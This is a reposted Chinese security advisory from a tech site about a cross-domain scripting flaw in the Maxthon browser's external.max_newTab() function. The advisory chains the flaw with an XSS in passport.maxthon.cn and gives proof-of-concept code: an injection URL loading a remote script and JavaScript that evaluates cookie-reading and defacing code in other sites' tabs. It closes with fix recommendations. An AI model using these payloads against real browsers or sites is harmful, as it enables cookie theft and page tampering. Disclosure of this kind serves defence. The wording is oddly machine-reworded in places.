日期:2010-08-25 01:33:00 来源:本站整理
遨游浏览器跨域脚本漏洞及修复筹划[网络技术]
本文“遨游浏览器跨域脚本漏洞及修复筹划[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
傲游浏览器是符合中国人利用习惯的多标签浏览器,拥有业界最优异的在线珍藏和广告过滤功效 .遨游浏览器在架构计划上存在一个安全缺陷,同时结合自身接口函数的安全问题,可以冲破浏览器同源战略,招致一个跨域脚本漏洞.
遨游浏览器一个external接口函数没有遵守同源战略,存在一个跨域脚本漏洞.
漏洞函数external.max_newTab(),函数的功效是翻开一个新的标签页.该函数存在一个时间竞争条件错误,可以冲破同源战略跨域操作窗口对象,跨域履行肆意脚本.
同时遨游浏览器自定义开辟的external接口函数设定了一个信任域,该信任域包含*.maxthon.cn等,结合*.maxthon.cn肆意web利用的一个脚本漏洞便可以调用漏洞函数external.max_newTab()履行跨域操作.
POC:
1. passport.maxthon.cn存在一个跨站脚本漏洞,通过跨站脚本漏洞可以调用漏洞函数,嵌入一个远程的js http://127.0.0.1/vul.js
http://passport.maxthon.cn/new/register_account.html?account="><script/src=http://127.0.0.1/vul.js></script>
2.调用漏洞函数的javascript脚本
hijack_code = "alert(document.cookie);document.write('hacked by rayh4c#80sec.com')"
t1 = external.max_newTab("a",'http://www.sina.com/',"activate:yes")
t2 = external.max_newTab("b",'http://www.百度.com/',"activate:yes")
t3 = external.max_newTab("a",'http://www.sohu.com/',"activate:yes")
setInterval("t1.eval(hijack_code)",1)
setInterval("t2.eval(hijack_code)",2)
setInterval("t3.eval(hijack_code)",3)
危害后果:
新翻开的三个标签页窗口将随机命中一个窗口跨域注入脚本运行,如百度网页被读取COOKIE并篡改网页.
修复筹划:
1.修复*.maxthon.cn域名内的WEB利用漏洞.
2.修复有漏洞的接口函数external.max_newTab().
以上是“遨游浏览器跨域脚本漏洞及修复筹划[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |
评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论